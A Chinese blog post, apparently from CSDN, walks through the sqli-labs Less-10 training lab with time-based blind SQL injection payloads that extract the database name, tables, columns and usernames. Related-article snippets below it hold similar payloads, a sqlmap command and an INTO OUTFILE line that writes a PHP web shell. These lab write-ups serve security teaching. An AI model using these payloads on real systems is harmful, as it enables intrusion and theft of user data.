sqli-labs Less-10

最新推荐文章于 2025-07-31 11:53:35 发布
原创 最新推荐文章于 2025-07-31 11:53:35 发布 · 297 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

该博客详细介绍了如何利用基于时间的盲注技术进行SQL注入攻击,首先通过猜解确定数据库名为'security',接着找出数据表emails, referers, uagents, users,并进一步获取了users表中的列名id, username, password,最后揭示了username的值。" 114786294,10537895,腾讯云MySQL数据库冷备回档实践,"['数据库管理', 'MySQL', '数据备份', '云服务', '数据恢复']

Less-10 Get - Blind -Time based -double quotes
基于时间的盲注
(Less-9 与Less-10的区别在于一个是单引号一个是双引号,其他判断步骤一致)*在这里插入图片描述*

正确的直接返回,错误的时候等待5秒钟。
1.猜测数据库:
?id=1” and If(ascii(substr(database(),1,1))=115,1,sleep(5))–+
在这里插入图片描述
?id=1” and If(ascii(substr(database(),1,1))=114,1,sleep(5))–+
在这里插入图片描述
说明第一位是s (ascii码是115)

?id=1” and If(ascii(substr(database(),2,1))=101,1,sleep(5))–+
说明第二位是e (ascii码是101)
… 以此类推,得到数据库名字是security

2.猜测security数据库的数据表:
?id=1” and If(ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101,1,sleep(5))–+
说明第一个数据表的第一位是e,
…依次类推,得到emails

?id=1” and If(ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 1,1),1,1))=114,1,sleep(5))–+
(判断步骤同上)多次尝试后得到所有的数据表emails,referers,uagents,users

3.猜测users表的列:
?id=1” and If(ascii(substr((select column_name from information_schema.columns where table_name=‘users’ limit 0,1),1,1))=105,1,sleep(5))–+
(判断步骤同上)多次尝试,到列名是id,username,password

4.猜测username的值:
?id=1” and If(ascii(substr((select username from users limit 0,1),1,1))=68,1,sleep(5))–+
(判断步骤同上)多次尝试 得到所有的用户名和密码

SQL-libs Less-10
AgonYAN的博客
07-13 314
SQL-libs Less-10
sql注入之sqli-labs系列教程(less1-10)详解
wangqaz50的博客
02-03 453
<div id="article_content" class="article_content clearfix"> <link rel="stylesheet" href="https://csdnimg.cn/release/blogv2/dist/mdeditor/css/editerView/ck_htmledit_views-b5506197d8.css"> <div id="content_views" class="mar...
sqli-labs (less-10)
kukudeshuo的博客
03-08 297
sqli-labs (less-10) 输入 http://127.0.0.1/sql1/Less-10/?id=1 and sleep(5)--+ #快速执行 http://127.0.0.1/sql1/Less-10/?id=1' and sleep(5)--+ #快速执行 http://127.0.0.1/sql1/Less-10/?id=1" and sleep(5)--+ #休眠5秒 判断为字符型注入,这里因为也是不论输入什么都显示 You are in…,依然使用时间盲注 判断当前数据库长度
sqli-labsLess-10关卡详细解析
qq_62000508的博客
07-31 717
本文详细介绍了SQL注入攻击中时间盲注的手工方法。通过分析Less-10关卡中的SQL语句结构,作者选择时间盲注作为突破口。文章从基础排查数据库信息开始,逐步展示了如何利用延时函数判断数据库名、表名和字段名,最终获取敏感数据。关键步骤包括:1) 使用length()判断目标长度;2) 利用substr()逐字符分析内容;3) 通过if()结合sleep()实现时间延迟判断。文中还提供了完整的URL示例和参数汇总表,涵盖了闭合符号、注释符、系统数据库查询等核心技巧。这种手工注入方法虽然耗时,但能有效绕过基本防
Sqli-labs靶场详细攻略Less 6-10
qq_41755084的博客
10-10 1091
与第五关相似,只是闭合的单引号换为了双引号。
Sqli-labs less 10
weixin_34122548的博客
08-11 192
Less-10 本关我们从标题就可以看到 《基于时间-双引号》,所以很明显的这关要我们利用延时注入进行,同时id参数进行的是 " 的处理。和less9的区别就在于单引号(')变成了("),我们这里给出一个payload示例,其他的请参考less-9 猜测数据库: http://127.0.0.1/sqllib/Less-10/?id=1"and%20If(ascii(substr(data...
sqli-labs ————less -10
Fly_鹏程万里
05-11 545
Less-10查看源代码:由此可见,这里是一个基于时间注入的双引号注入。猜测数据库:http://192.168.11.136/sqli-labs/Less-10?id=1" and if (ascii(substr(database(),1,1))=115),1,sleep(5)) --+之后的猜测表名、字段名、字段值与上一关的基本相同,唯一不同之处就是“ ' ”与“ ””。这里就不再多复述了。...
精选资源
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
精选资源
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
精选资源
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未...
sqli-labs less-26 空格绕过
wanggonghanfei的博客
10-13 1144
sqli-labs less-26 空格绕过
sqli-labs靶场Less-10
songling515010475的专栏
08-25 427
1、访问首页,/Less-10/index.php?id=1,这里的传参点是id 探测六步 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注 http://192.168.60.142:8080/sqlilabs/Less-10/index.php?id=1 ' and sleep(10)-- qwe 分析:这里使用的是双引号闭合+延时盲注,和第9关一样的操作,只是闭合不一样。 2、使用 i..
Sqli-labsLess1-10
Mi1k7ea
04-14 4756
为了更好地学习SQL注入,便从sqli-labs开始入手吧。很多东西都是不懂,所以也是从各位前辈、大牛的博客以及书籍中去学习,将自己学到的都记录一下,以便以后的查看。同时也希望各位能够多多给点指导,让本人能够更好地掌握各种方法技巧等等。 为了更方便地实现操作,直接用Firefox的HackBar插件来操作~ Less1--基于错误的单引号字符型注入 直接在url中输入?id=1可以看
sqli-labs教程——Less 1-10
Lilin's博客
12-10 2320
sqli-labs教程——Less 1-10 Page-1 Basic ChallengesLess-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)1. 判断是否有注入点2. 判断闭合字符3. 判断当前页面中sql语句的查询列数4. 判断数据在页面中的回显位置和sql语句中回显位5. 判断当前页面连接的数据库名称6. 判断security数据库中的表名称信息7. 判断users表的列名称信息8. 查询users表的所有信息Less
sqli-labs less-10
阿刁〇的博客
04-02 117
文章目录sqli-labs less-10* 判断注入 sqli-labs less-10 本关和第9关类似,只是注入存在区别 * 判断注入 ?id=1‘ and sleep(5) --+ 延时2秒 ?id=1" and sleep(5) --+ 延时7秒 故注入方式为双引号闭合 接下来的步骤与第九关相同,就不多做赘述 ...
sqli-labs/Less-10
m0_71299382的博客
11-09 222
sqli-labs第十关
sqlilabs less10
TA不懒,但还没有添加简介
06-27 264
sqlilabs less10
SQLI LABS | Less-10 GET-Blind-Time based-double quotes
Blue17 の 小窝
10-26 958
只要我们的 Payload 能够逃逸出这两种符号,后端返回的内容多少都会有些异常的。但是从上面的五组 Payload 来看,后端返回的都是一样的数据。可以看到,我们已经成功获取了当前站点使用的后端数据库的信息。,似乎是认可了我们的操作,但是我们并没有获得什么有效的信息。目标后端过滤的很好,我们测试的 Payload 都没有成功逃逸出目标的过滤。目标后端过滤的不好,它执行了我们传递给它的参数,但是它通过回显欺骗了我们。如上,我们一共测试了 5 个 Payload,后端返回的一直都是。
sqli-labs less8
最新发布
08-19
sqli-labs 平台的 Less-8 关卡是一个典型的布尔盲注(Boolean-based Blind SQL Injection)场景。该关卡没有明确的回显信息,攻击者需要通过页面返回的布尔状态(正常或异常)来判断注入语句是否执行成功,从而逐步推断数据库信息。 ### 解题思路 在 Less-8 中,注入点位于 `id` 参数,使用单引号 `'` 作为闭合方式。注入点的基本形式为: ```http http://localhost/sqli-labs/Less-8/?id=1' ``` #### 1. 判断注入点是否存在 尝试构造布尔表达式来验证注入点是否有效。例如: ```http http://localhost/sqli-labs/Less-8/?id=1' AND 1=1 --+ ``` 如果页面正常显示内容,则说明布尔表达式为真时页面正常;再尝试: ```http http://localhost/sqli-labs/Less-8/?id=1' AND 1=2 --+ ``` 如果页面无内容或出现错误,则确认存在布尔盲注漏洞。 #### 2. 猜解数据库名称长度 通过 `LENGTH(database())` 函数判断当前数据库名称的长度: ```http http://localhost/sqli-labs/Less-8/?id=1' AND LENGTH(database()) > 5 --+ ``` 逐步调整数值,确定数据库名称的具体长度。 #### 3. 猜解数据库名称 使用 `SUBSTR()` 和 `ASCII()` 函数逐字符判断数据库名称: ```http http://localhost/sqli-labs/Less-8/?id=1' AND ASCII(SUBSTR(database(),1,1)) > 97 --+ ``` 通过二分法逐步缩小字符范围,最终确定数据库名称。 #### 4. 猜解表名 假设已知数据库名为 `security`,可以使用以下语句获取表名: ```http http://localhost/sqli-labs/Less-8/?id=1' AND ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema='security' LIMIT 0,1),1,1)) > 97 --+ ``` 逐字符获取表名,直到完整识别出目标表(如 `users`)。 #### 5. 猜解列名 获取 `users` 表的列名: ```http http://localhost/sqli-labs/Less-8/?id=1' AND ASCII(SUBSTR((SELECT column_name FROM information_schema.columns WHERE table_name='users' AND table_schema='security' LIMIT 0,1),1,1)) > 97 --+ ``` 逐字符获取列名,如 `username`、`password` 等。 #### 6. 获取数据 最后,获取具体字段的数据,例如用户名和密码: ```http http://localhost/sqli-labs/Less-8/?id=1' AND ASCII(SUBSTR((SELECT username FROM users LIMIT 0,1),1,1)) > 64 --+ ``` 重复上述步骤,逐字符提取敏感信息。 ### 自动化工具辅助 在实际渗透测试中,可以使用如 **sqlmap** 等工具自动完成上述过程。例如: ```bash sqlmap -u "http://localhost/sqli-labs/Less-8/?id=1" --batch --risk=3 --level=5 --dbs ``` 该命令可自动探测数据库信息,并提取表名和字段内容。 ### 注意事项 - 所有操作应在合法授权范围内进行,避免非法入侵。 - 布尔盲注效率较低,建议结合延时注入(Time-based Blind SQL Injection)提升速度。 - 部分 WAF(Web Application Firewall)可能拦截敏感关键字,需对注入语句进行编码或绕过处理。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值